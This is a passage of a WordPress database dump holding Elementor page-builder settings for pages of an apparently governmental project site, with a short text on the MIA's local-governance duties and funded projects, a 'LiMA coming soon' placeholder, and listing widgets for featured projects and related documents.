More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17896,1612,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17897,2635,'_elementor_edit_mode','builder'),(17898,2635,'_elementor_template_type','wp-post'),(17899,2635,'_elementor_version','2.7.5'),(17900,2635,'_wp_page_template','default'),(17901,2635,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17904,2636,'_elementor_edit_mode','builder'),(17905,2636,'_elementor_template_type','wp-post'),(17906,2636,'_elementor_version','2.7.5'),(17907,2636,'_wp_page_template','default'),(17908,2636,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17909,1610,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17910,2637,'_elementor_edit_mode','builder'),(17911,2637,'_elementor_template_type','wp-post'),(17912,2637,'_elementor_version','2.7.5'),(17913,2637,'_wp_page_template','default'),(17914,2637,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17917,2638,'_elementor_edit_mode','builder'),(17918,2638,'_elementor_template_type','wp-post'),(17919,2638,'_elementor_version','2.7.5'),(17920,2638,'_wp_page_template','default'),(17921,2638,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" 